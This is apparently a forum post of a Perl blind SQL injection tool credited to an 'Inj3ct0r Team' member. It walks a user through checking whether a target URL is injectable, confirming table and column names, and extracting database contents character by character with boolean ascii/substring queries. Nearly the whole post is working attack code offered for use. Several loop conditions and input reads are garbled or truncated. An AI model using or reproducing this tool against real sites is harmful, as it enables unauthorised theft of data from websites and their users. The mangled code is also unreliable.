13 Years of Service
24%
Code:
>#!/usr/bin/perl
use LWP::Simple;
use Time::HiRes qw(gettimeofday);
###############################################################
$string='';
$limit=0;
#string variable###############################################
# if the string that you want to use is not writable #
# on the shell you can write in this variable and #
# whene the script order from you the variable just #
# press enter. #
###############################################################
#limit variable##############################################
# if you want a particular column just change this #
# variable. #
#############################################################
@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);
$glob_stat;
print "\n\t===============================================*\n";
print "\t* Blind Sql Injection Tool *\n";
print "\t* Coded By Angel Injection *\n";
print "\t* Member From Inj3ct0r Team *\n";
print "\t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *\n";
print "\t===============================================*\n\n";
print "Stage 1:Checking if the target is vulnerable\n\n";
print "You should now enter the infected url\n";
print "Example :http://www.localhost/index.php?id=1\n\n";
print "URL: ";
my $url = ;
chomp($url);
$now = time_mili();
my $yes = get("$url+and+1=1");
$later = time_mili();
$exect = $later - $now;
$exect = sprintf("%.2f", $exect);
my $no = get("$url+and+1=0");
def($yes,$no);
print "Stage 2 :
[*]Checking For A String That Can lead To exploit The Target
[*]\n\n";
print " You should now enter a string(from shell or source code)\n";
print " and wait to see if is a good one. Your string must be \n";
print " related to the target\n\n";
print " The string must exist on the true page or the false page \n";
print " but not on both of them.\n";
print " A file has been created under the name string.txt it may help\n";
print " you to choose your string\n\n";
if($string eq ''){
print "String: ";
$string = ;
chomp($string);
while(strc($yes,$no)!=1){
print "String: ";
$string = ;
chomp($string);
}
}
else{
if(strc($yes,$no)!=1){
print "Please Choose another one\n: ";
exit;
}
}
chomp($string);
print "\n => Nice choice\n\n";
print "Stage 3 :
[*]Extracting Information From Database
[*]\n\n";
print " You should now enter The Table name\n";
print " and number of Columns to be extracted\n";
print " and their names and condition on this columns\n";
print " if you want it\n\n";
print "Table Name : ";
my $tbname = ;
chomp($tbname);
print "Columns Number : ";
my $num = ;
chomp($num);
if($num =~ /^[+-]?\d+$/){
chomp($num);
}
else{
while($num !~ /^[+-]?\d+$/){
print "Columns Number : ";
$num = ;
chomp($num);
}
}
chomp($num);
my @column,@trcolmun,@numtr,@result;
for(my $q=0;$qprint "Columns Name : ";
$column[$q] = ;
chomp($column[$q]);
}
print "\n Do You have any condition on your information\n";
print " Exemple: where id=1\n\n";
print "(yes/no): ";
my $condt = ;
chomp($condt);
if($condt eq 'yes'){
print "\nEnter Condition: ";
$condition=;
chomp($condition);
}
print "\nStage 3-1 :
[*]Checking table and columns
[*]\n\n";
print " Nothing That You Can do it now\n";
print " just let the script do his job\n\n";
my $pr=chvar("$url+and+(SELECT 1 from $tbname limit 0,1)=1");
if($pr==1){
print " => Table Existe\n";
}
else{
print " => Table Dosn't Existe";
exit;
}
my $j=0;
for(my $q=0;$q$pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");
if($pr==1){
$trcolumn[$j] = $column[$q];
print " => Column $column[$q] Existe\n";
$j++;
}
else{
print " => Column $column[$q] Dosn't Existe\n";
}
}
$trco = @trcolumn;
if($trco==0){
print "\n => No Columns Found\n";
exit;
}
print "\nStage 3-2 :
[*]Extracting Columns length
[*]\n\n";
print " The Script is going now to get each\n";
print " columns length\n";
print "\nCounting length of Columns...\n\n";
for(my $q=0;$qmy $qj=0;
my $ii=1;
while($qj==0){
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$ii++;
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$qj=1;
}
else{
$ii--
}
}
$ii++;
}
$ii -=3;
$numtr[$q]=$ii;
print " => $trcolumn[$q] : $ii\n";
}
for(my $rul=0;$rul$result[$rul]='';
}
$gtf=0;
($second, $minute, $hour) = localtime();
print "\nExtracting information ...\n\n";
print "Guessing time for each column(in seconds)\n\n";
for(my $idn=0;$idn$max = $numtr[$idn] * $exect * 8;
$max=sprintf("%.2f", $max);
$gtf+=$max;
print " #=> $trcolumn[$idn] max time of extraction = $max\n";
}
print "\nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)\n\n";
$now1 = time_mili();
for(my $bn=0;$bn$nowt = time_mili();
for(my $bnum=1;$bnummy $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))");
$result[$bn].=pack("c",$ascii);
}
$latert = time_mili();
$realt = $latert - $nowt;
$realt=sprintf("%.2f", $realt);
print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)\n";
}
$later1 = time_mili();
$exect1 = $later1 - $now1;
$exect1 = sprintf("%.2f", $exect1);
($second, $minute, $hour) = localtime() ;
print "\nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) \n\n";
sub opt{
my $url=$_[0];
my $isnum = $url;
my $sym_st;
$isnum .= ">57";
my $isalpha = $url;
$isalpha .= ">96";
my $isAlpha = $url;
$isAlpha .= ">65";
my $rt='';
my $brp = chvar($isnum);
if($brp==1){
my $brp1 = chvar($isalpha);
if($brp1==1){
$rt = brute_alpha($url,97,103,110,115,122);
$sym_st=3;
}
else{
$rt = brute_alpha($url,65,71,78,83,90);
$sym_st=2;
}
}
else{
$rt = brute_num($url);
$sym_st=1;
}
if(ord($rt) == 0){
$rt = opt_sym($url,$sym_st);
}
return $rt;
}
sub opt_sym(){
my $url = $_[0];
my $rt='';
if($_[1]==1){
my $ft = $url;
$ft .= ">40";
my $rft = chvar($ft);
if($rft==1){
$rt = brute_sym($url,8,15);
}
else{
$rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){
$rt=brute_sym($url,16,22);
}
else{
$rt=brute_sym($url,23,32);
}
}
return $rt;
}
sub reduse{
for(my $i=$_[0];$imy $tmp = $_[2];
$tmp .="=$i";
my $qq = chvar($tmp);
if($qq==1){
return $i;
last;
}
}
}
sub brute_sym(){
my $ek;
for(my $i=$_[1];$imy $tmp = $_[0];
$tmp .="=$ascii_sym[$i]";
my $qq = chvar($tmp);
if($qq==1){
$ek=$i;
last;
}
}
return $ascii_sym[$ek];
}
sub brute_num(){
my $url = $_[0];
my $ft = $url;
my $rt='';
$ft .= ">52";
my $mrp = chvar($ft);
if($mrp==1){
$rt = reduse(53,57,$url);
}
else{
$rt = reduse(48,52,$url);
}
return $rt;
}
sub brute_alpha(){
my $url = $_[0];
my $ft = $url;
my $sd = $url;
my $td = $url;
my $rt ='';
$ft .= ">$_[2]";
$sd .= ">$_[3]";
$td .= ">$_[4]";
my $mrp = chvar($ft);
if($mrp==1){
my $mrp1 = chvar($sd);
if($mrp1==1){
my $mrp2=chvar($td);
if($mrp2==1){
$rt = reduse(($_[4]+1),$_[5],$url);
}
else{
$rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{
$rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{
$rt = reduse($_[1],$_[2],$url);
}
return $rt;
}
sub strc{
my $tmp=0;
if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){
$glob_stat=1;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){
$glob_stat=0;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
return 0;
}
}
sub def{
my @fi = split(//,$_[0]);
my @sd = split(//,$_[1]);
my $rt='';
my $cn = @fi;
my $cn1 = @sd;
my $k;
($cn>$cn1) ? $k=$cn : $k=$cn1;
my $i,$j=0;
for($i=0;$iif($fi[$i] ne $sd[$i]){
$rt.=$fi[$i];
$j++;
}
}
if(($j>5) && ($jprint "\n => Target Maybe Vulnerable\n\n";
open(MYFILE,'>string.txt');
print MYFILE $rt;
close(MYFILE);
}
else{
print "\n => Target Not Vulnerable\n\n";
exit;
}
}
sub chvar{
my $url=$_[0];
my $tmp = get($url);
if($tmp=~/$string/){
if($glob_stat==1){
return 1;
}
elsif($glob_stat==0){
return 0;
}
}
elsif($tmp!~/$string/){
if($glob_stat==1){
return 0;
}
elsif($glob_stat==0){
return 1;
}
}
}
sub time_mili(){
my $s,$m,$r;
($s,$m) = gettimeofday();
$r = "$s.$m";
$r +=0;
my $rt = sprintf("%.3f", $r);
$rt +=0;
return $rt;
}